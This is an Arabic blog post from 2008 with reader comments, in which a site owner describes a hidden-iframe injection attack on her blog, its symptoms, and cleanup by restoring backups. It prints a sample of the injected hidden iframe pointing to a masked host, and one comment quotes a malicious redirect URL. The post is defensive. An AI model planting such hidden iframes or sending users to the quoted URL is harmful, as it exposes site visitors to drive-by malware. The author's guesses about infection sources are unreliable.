السبت، 20 ديسمبر 2008

iframe attach

تعرض هذا الموقع (بما في ذلك المدونة) لهجوم من نوع iframe attach الذي اكتشفت لاحقاً انه نفس الهجوم الذي تعرضت له مدونة هديل رحمها الله فبل فترة، هذا الهجوم يصيب المواقع وانطمة ادارة المحتوى ( منتدى - مدونة - نيوك - الخ ) حيث يزرع على السيرفر فايروس يُولد كود من نوع hidden iframe أو JavaScript يصيب كافة ملفات html. في اماكن مختلفة : اما بعد سطري </body></html> كما حدث معي ، او قبل </body> كما حصل لـ Creative Briefing .
</body>
</html>
<iframe src="http://XXXX.com/?click=XXXXXXX" width=1 height=1 style="visibility:hidden; position:absolute"></iframe>

من أين يأتي الفايروس؟ قد يكون من السيرفر (والاستضافة لم تعطيني سبب مقنع) وقد يكون من الجهاز خصوصاً من يمتلك برنامج Google desktop .

اعراض الهجوم:

  • يتم تحميل الصفحة بسرعة وتظهر على الفور صفحة الخطأ 404 ( الصفحة غير موجود ).

  • بينما يتم تحميل الصفحة يظهر في شريط الحالة: waiting for: http://XXXX.com/.....

  • يكتشف برنامج الانتي فايروس تروجان او فايروس يصيب جهاز الزائر.


الحالتين الاخيرة هي ما حصل مع موقعي، سرعة تدارك المشكلة ساعدتني في ايقاف الموقع حتى ينتهي الخلل، فقد راسلني احد الاخوة باكتشاف حمايته لتروجان عند زيارة صفحة الاندكس، في رسالة شديدة اللهجة اعتقاداً بأني وضعت التروجان عمداً للزوار :) .
( نصيحة: تطوع وساهم وتفاعل اذا وجدت خللاً او عطباً في موقع ما وابلغ مدير الموقع على الفور؛ يشمل ذلك موقعي :) ) .

الحـل:

  1. حذف جميع الملفات واعادة رفع ملفات جديدة غير مصابة.

  2. استعادة نسخة احتياطية لتاريخ من المؤكد سلامة الموقع فيه.


وللاسف، الاصابة مرة أخرى أمر وارد لعدم وجود حل جذري حتى الآن!

مقالات مرتبطة:

أنصح بقراءة وتطبيق:

----

لا أنسى أن أشكر الكثيرين من نخبة المدونين اللذين ساهموا واقترحوا لحل المشكلة .. مع وافر التحية (f) ..

هناك 15 تعليقًا:

  1. لا إله إلا الله، الحمد لله اللي كان عندك نسخة احتياطية، خايف على مدونتي الآن :)

    بس السؤال هو كيف وصل الفايروس للاستضافة؟!

    ردحذف
  2. عودا حميدا سلوى،،


    لا حظت نفس الشيء حصل لمدونة شاطيء الابداع


    الحمدلله ع السلامه

    :d


    توتــا

    ردحذف
  3. اول شيء الحمدلله على السلامة :)
    ثاني شيء كيف من قوقل دسك توب ؟
    هل قصدك تطبيق في البرنامج يقوم بالإستخدام برنامج الـ ftp وتعديل كل الملفات ؟

    ردحذف
  4. خالد
    اهلاً بك، من الغريب فعلاً وجود الفايروس على السيرفر، كيف انتقل؟
    ربما من جهازي وربما من السيرفر ..
    النسخة الاحتياطية مهمة مهمة مهمة ، على الجميع توخي الحذر :).

    توتــا
    مرحبا بالعزيزة توتا ، مدونة شاطئ كان أختراق للسيرفر وحسبي الله على من حذف قاعدة بيانات 500 موقع !!

    ردحذف
  5. سلامات ..
    الحمد لله ان المدونة رجعت سليمة ومعافاة ..

    كما قلتي اما من احد برامج الجهاز وذلك عند تحرريرك لاي ملف من ملفات موقعك للتعديل عليها يتم زراعة هذا الامر في الملف ، او عن طريق السيرفر والحماية الضعيفة عليه ..

    لا تنسين تاخذين باك اب للموقع بشكل كامل ..

    ردحذف
  6. يبدو أن المخترقين قد بدأوا نشاطهم من جديد

    هناك أيضاً فايروس جديد أراه ينتشر في مواقع الإنترنت
    كتبت عنه هنا: http://nabeel.ws/post.php?postID=37

    ردحذف
  7. الله يعطيك العافيه سلوى
    شكراا على التنبيه
    بس الله يستر

    شكرا على التوعيه سلوى الله يخليك

    ردحذف
  8. عوداً حميداً سلوى ،،

    طيب يا عزيزتي ،، مافي برنامج حماية ارفعها ع السيرفر
    تحمي و لو جزء بسيط من هذه الاختراقات ..

    يعني التعب يلي بعانيه من تصميم موقع و برمجته و بعد ماارفعه
    يجيني نوبت القلق خوفا من الإختراق !

    الله يكافيهم و يبصرنا ..
    وجزاك الله خير ع التنويه ^_^

    ردحذف
  9. على طاري الفايروسات فيه بعض المدونات لمن أفتحها يقولي إنو موقع هجوم مبلغ عنه إيش يعني ؟ يفتح لي دا الرابط :
    http://brbg.ru/sut/in.cgi?2

    والمشكله إنو عرفت بعدين إن كمان مدونتي لمن يدخلها أحد كدا
    تعرفي المشكله مني ولا من مواقعهم ولا أجهزتهم عجرت اعرف السبب !

    ردحذف
  10. عوداً حميداً حبيبة قلبي ..
    وجزاك الله كل الخير :)
    الله يحفظنا جميعاً لأني وحده ما عرف في هالأمور :(
    عندي مشكلة في مدونتي علامات الاستفهام مدري كيف أحلها :(
    ربي يحفظك من كل مكروه ..
    في حفظ الرحمن ..

    ردحذف
  11. السلام عليكم

    اخت سلوى احب انبه ان هذا الفيروس يأتي عن طريق الاستضافة وقد سبق وتعرضت له وكلما مسحته يعود حتى غيرت الاستضافة التي موقعي عليها .. اذا عاد الفيروس مرة اخرى اعلمي انه السيرفر مضروب

    نواف

    ردحذف
  12. خالد
    لا أتصور مديراً لاي موقع ينام ليلاً دون التأكد من وجود النسخة الاحتياطية :) . كيف وصل الفايروس للاستضافة؟
    يوجد عدة اسباب: قد يكون من خلال تطبيق Google Desktop او من خلال ثغرة في أحد المواقع الموجودة على السيرفر والاحتمال الاضعف وجود ثغرة في الوردبريس.
    --------

    الإعصار الأحمر
    كما قرأت؛ الملفات المرفوعة من جهاز يحوي Google Desktop قد تكون مصابة بهذا الفايروس الذي يصيب السيرفر فيما بعد.
    --------

    جندبي
    نعم، هو كذلك. شكراً لك :) .
    --------

    نبيل
    اوووه! هذا صحيح ..
    أشكرك للتنبية، ادرجت الرابط في التدوينة ..
    --------

    جنان
    الله يعافيكِ ..
    --------

    فردوس
    الحماية تكون من شركة الاستضافة، احرصي على شركة تكون جيدة في الامان ومستوى الحماية وان كان بزياة في السعر، Safety first .
    --------

    Mashael.M
    يعني يا عزيزتي ان هذه المواقع مصابة!
    انتبهي لا تفتحيها لانها سوف تلحق الضرر بجهازك :|
    --------

    ندى الفجر
    اهلاً بالزميلة :) .. الله يحفظنا جميعاً ..
    بالنسبة لعلامات الاستفهام؛ شيكي على ايميلك ..
    --------

    نواف
    وعليكم السلام والرحمة.
    نعم قد يكون ذلك، كما ذكرت بالاعلى ان الفايروس قد يأتي من ثغرة على أحد المواقع على السيرفر وينتقل للمواقع المجاورة.
    أخضعت الموقع لفترة تجريبية بعد الاستعادة، لم يعود .
    أشكرك لمشاركتي خبرتك :) .
    --------

    StEElBeaUtY
    اهلا بك .

    ردحذف
  13. و الله فيروس خطير

    الله يعطيكي العافية على التنبيه

    و ان شاء الله ما يعود يجي

    ردحذف
  14. حدث معى هذا الموقف والحمد لله عرفت السبب لكن بعد خسارة كبيرة.

    شغلى كله على مدار 3 سنوات ذهب بلا رجعة ولا حتى ملف واحد, والسبب يرجع لفيروس من نوع التروجان بس أخطر من التروجان العادى اللى كلنا نعرفه ده بيتعامل مع الكمبيوتر والهواتف النقالة وكمان على السيرفر كامل ماشاء الله.

    كنت ادخل على موقعى وجدت عنوانين غريبة تحمل فى البار تحت اوقفت تحميل الصفحة لكن بدون جدوى وهكذا عرفت ان الفيرس انتقل من جهازى للموقع من خلال الFTP . وعشان كده عايز اقولك لو كان لديك موقع تأكد من أن جهازك خالى من الفيروسات والتروجانات قبل اتصالك بالـ FTP لانك ستصيب اجهزة العديد من الناس بدون أى ذنب. :)

    بعد تأكدك من سلامة جهازك واذا كان موقعك يحمل هذا النوع من الفيروسات يمكنك ازالة الفيروس بسهولة. لانه غالباً يكون قبل علامة ويمكن أن يحل محلها لانه يحقن نفسه فى أول سطر من أكواد الصفحة أو أخر سطر منها, وغالباً أيضاً يكون عبارة عن سطر جافاسكربت يستدعى بها صفحة من موقع أخر مثل وظيفة الفرام تمام,
    أسف على الاطالة لكن وجب التنبيه.

    ردحذف